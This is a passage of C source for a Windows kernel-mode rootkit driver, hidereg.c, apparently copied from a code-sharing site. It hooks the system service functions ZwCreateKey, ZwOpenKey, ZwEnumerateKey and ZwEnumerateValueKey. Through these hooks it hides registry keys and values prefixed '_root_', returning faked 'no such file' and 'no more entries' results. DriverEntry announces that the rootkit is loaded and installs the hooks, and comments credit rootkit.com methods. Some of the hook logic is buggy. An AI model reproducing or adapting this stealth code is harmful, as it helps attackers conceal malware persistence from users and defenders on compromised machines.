📄 hidereg.c
字号:
rc = Real_ZwCreateKey (KeyHandle, DesiredAccess, ObjectAttributes,
TitleIndex, Class, CreateOptions, Disposition);
return rc;
}
/*
* Hook of ZwOpenKey();
*/
NTSTATUS Hook_ZwOpenKey (
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
)
{
NTSTATUS rc;
PCHAR szFullName;
szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
if (szFullName != NULL) {
if (PathFromHandle (ObjectAttributes->RootDirectory,
ObjectAttributes->ObjectName, szFullName)) {
AdjustKeyName (szFullName);
if (CheckKeyByName (szFullName)) {
ExFreePool (szFullName);
return STATUS_NO_SUCH_FILE;
}
}
ExFreePool (szFullName);
}
rc = Real_ZwOpenKey (KeyHandle, DesiredAccess, ObjectAttributes);
return rc;
}
/*
* Hook of ZwEnumerateKey();
*/
NTSTATUS Hook_ZwEnumerateKey (
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength
)
{
NTSTATUS rc;
PCHAR szFullName;
PWCHAR pName = NULL;
PULONG pulNameLen = NULL;
//DbgPrint("zwenumeratekey called\n");
/* Find the full name of the key and check access on it */
szFullName = ExAllocatePool (PagedPool, MAXPATHLEN);
if (szFullName != NULL) {
if (!PathFromHandle (KeyHandle, NULL, szFullName)) {
ExFreePool (szFullName);
szFullName = NULL;
}
}
rc = Real_ZwEnumerateKey (KeyHandle, Index, KeyInformationClass,
KeyInformation, Length, ResultLength);
if (NT_SUCCESS (rc) && szFullName != NULL) {
switch (KeyInformationClass) {
case KeyBasicInformation:
pName = ((PKEY_BASIC_INFORMATION)KeyInformation)->Name;
pulNameLen = &((PKEY_BASIC_INFORMATION)KeyInformation)->NameLength;
break;
case KeyNodeInformation:
pName = ((PKEY_NODE_INFORMATION)KeyInformation)->Name;
pulNameLen = &((PKEY_NODE_INFORMATION)KeyInformation)->NameLength;
break;
case KeyNameInformation:
pName = ((PKEY_NAME_INFORMATION)KeyInformation)->Name;
pulNameLen = &((PKEY_NAME_INFORMATION)KeyInformation)->NameLength;
break;
case KeyFullInformation:
break;
default:
DbgPrint("Hook_ZwEnumerateKey(): unknown class %d",
KeyInformationClass);
}
if (pName != NULL) {
UNICODE_STRING us;
ANSI_STRING as;
strcat (szFullName, "\\");
us.Length = us.MaximumLength = (USHORT)*pulNameLen;
us.Buffer = pName;
as.Length = 0;
as.MaximumLength = MAXPATHLEN - 1 - strlen (szFullName);
as.Buffer = szFullName + strlen (szFullName);
rc = RtlUnicodeStringToAnsiString (&as, &us, FALSE);
if (NT_SUCCESS (rc)) {
as.Buffer[as.Length] = '\0';
AdjustKeyName (szFullName);
//DbgPrint(szFullName);
if (CheckKeyByName (szFullName) )
{
//wcscpy (pName, L"temp");
//*pulNameLen = 0;
Index++;
// pName=NULL;
return Real_ZwEnumerateValueKey(KeyHandle, Index, KeyInformationClass,KeyInformation, Length, ResultLength);
}
}
}
}
if (szFullName != NULL)
ExFreePool (szFullName);
return rc;
}
/*
* Hook of ZwEnumerateValueKey(); hide protected values
* XXX not yet
*/
NTSTATUS Hook_ZwEnumerateValueKey (
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
)
{
NTSTATUS ntStatus;
PVOID NewKeyValueInformation; // pointer
PVOID KeyValueInfor;
KEY_VALUE_BASIC_INFORMATION BasicInfo; // bogus structure
KEY_VALUE_FULL_INFORMATION FullInfo; // bogus structure
KEY_VALUE_PARTIAL_INFORMATION PartInfo; // bogus structure
char name[100];
char *ptr;
int i;
if (KeyValueInformationClass == KeyValueBasicInformation)
NewKeyValueInformation = &BasicInfo;
if (KeyValueInformationClass == KeyValueFullInformation)
NewKeyValueInformation = &FullInfo;
if (KeyValueInformationClass == KeyValuePartialInformation )
NewKeyValueInformation = &PartInfo;
ntStatus = ((T_ZwEnumerateValueKey)(Real_ZwEnumerateValueKey)) (
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
if (NT_SUCCESS(ntStatus))
{
DbgPrint("enumerate value key!!\n");
if (KeyValueInformationClass == KeyValueBasicInformation)
{
KeyValueInfor=KeyValueInformation;
DbgPrint("basic!!\n");
//ptr=(char*)BasicInfo.Name;
//ptr=(char*)L"_root_";
DbgPrint("namelength: %d",((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->NameLength);
ptr=(char*)((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name;
sprintf(name,"%S",((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name);
DbgPrint(name);
/*for(i=0;i<(int)((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->NameLength;i++)
{
DbgPrint("0x%02x",*ptr);
ptr++;
}
*/
if (0 == memcmp(((KEY_VALUE_BASIC_INFORMATION*)KeyValueInfor)->Name,L"_root_",12))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // fake the result
}
}
if (KeyValueInformationClass == KeyValueFullInformation)
{
DbgPrint("FullInformation Enumerated!!!!!");
KeyValueInfor=KeyValueInformation;
if (0 == memcmp(((KEY_VALUE_FULL_INFORMATION*)KeyValueInfor)->Name,L"_root_",12))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // fake the result
}
}
if (KeyValueInformationClass == KeyValuePartialInformation)
{
if (0 == memcmp(PartInfo.Data,"_root_",6))
{
DbgPrint("Got Value from reg!\n");
return STATUS_NO_MORE_ENTRIES; // fake the result
}
}
// ok, we didn't find a RootkitPrefixed entry so we redo the shit with the original pointer
ntStatus = ((T_ZwEnumerateValueKey)(Real_ZwEnumerateValueKey)) (
KeyHandle,
Index,
KeyValueInformationClass,
KeyValueInformation,
Length,
ResultLength);
}
return ntStatus;
}
//把内核使用的键名改为容易理解的名字 根据rootkit.com 的方法
VOID AdjustKeyName (PCHAR szKeyName)
{
PCHAR p;
if (_strnicmp (szKeyName, "\\\\", 2) == 0) {
memmove (szKeyName, szKeyName + 1, strlen (szKeyName));
}
#define HKUS1 "\\REGISTRY\\USER\\S"
#define HKUS2 "HKEY_CURRENT_USER\\"
if (_strnicmp (szKeyName, HKUS1, sizeof(HKUS1) - 1) == 0) {
p = strchr (szKeyName + sizeof(HKUS1) + 1, '\\');
if (p == NULL)
return;
p++;
memmove (szKeyName + sizeof(HKUS2) - 1, p, strlen (p) + 1);
memcpy (szKeyName, HKUS2, sizeof(HKUS2) - 1);
#define HKU1 "\\REGISTRY\\USER\\"
#define HKU2 "HKEY_USERS\\"
} else if (_strnicmp (szKeyName, HKU1, sizeof(HKU1) - 1) == 0) {
p = szKeyName + sizeof(HKU1);
memmove (szKeyName + sizeof(HKU2) - 1, p, strlen (p) + 1);
memcpy (szKeyName, HKU2, sizeof(HKU2) - 1);
#define HKM1 "\\REGISTRY\\MACHINE\\"
#define HKM2 "HKEY_LOCAL_MACHINE\\"
} else if (_strnicmp (szKeyName, HKM1, sizeof(HKM1) - 1) == 0) {
p = szKeyName + sizeof(HKM1) - 1;
memmove (szKeyName + sizeof(HKM2) - 1, p, strlen (p) + 1);
memcpy (szKeyName, HKM2, sizeof(HKM2) - 1);
}
}
//////////////////安装注册表相关的函数HOOK
BOOLEAN InstallRegistryHooks (void)
{
DbgPrint("InstallRegistryHooks() entry");
Real_ZwCreateKey = (T_ZwCreateKey) HookSystemServiceByFn (
ZwCreateKey, Hook_ZwCreateKey);
if (Real_ZwCreateKey == NULL)
DbgPrint("InstallRegistryHooks() couldn't hook ZwCreateKey()");
Real_ZwOpenKey = (T_ZwOpenKey) HookSystemServiceByFn (
ZwOpenKey, Hook_ZwOpenKey);
if (Real_ZwOpenKey == NULL)
DbgPrint("InstallRegistryHooks() couldn't hook ZwOpenKey()");
Real_ZwEnumerateKey = (T_ZwEnumerateKey) HookSystemServiceByFn (
ZwEnumerateKey, Hook_ZwEnumerateKey);
if (Real_ZwEnumerateKey == NULL)
DbgPrint("InstallRegistryHooks() couldn't hook ZwEnumerateKey()");
Real_ZwEnumerateValueKey = (T_ZwEnumerateValueKey) HookSystemServiceByFn (
ZwEnumerateValueKey, Hook_ZwEnumerateValueKey);
if (Real_ZwEnumerateValueKey == NULL)
DbgPrint("InstallRegistryHooks() couldn't hook ZwEnumerateValueKey()");
DbgPrint("InstallRegistryHooks() exit");
return TRUE;
}
/////////////////移除注册表函数的钩子函数
void RemoveRegistryHooks (void)
{
DbgPrint("RemoveRegistryHooks() entry");
if (Real_ZwCreateKey != NULL)
HookSystemServiceByFn (ZwCreateKey, Real_ZwCreateKey);
if (Real_ZwOpenKey != NULL)
HookSystemServiceByFn (ZwOpenKey, Real_ZwOpenKey);
if (Real_ZwEnumerateKey != NULL)
HookSystemServiceByFn (ZwEnumerateKey, Real_ZwEnumerateKey);
if (Real_ZwEnumerateValueKey != NULL)
HookSystemServiceByFn (ZwEnumerateValueKey,
Real_ZwEnumerateValueKey);
DbgPrint("RemoveRegistryHooks() exit");
}
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
DbgPrint("The rootkit has been loaded!\n");
theDriverObject->DriverUnload = OnUnload;
InstallRegistryHooks();
return STATUS_SUCCESS;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -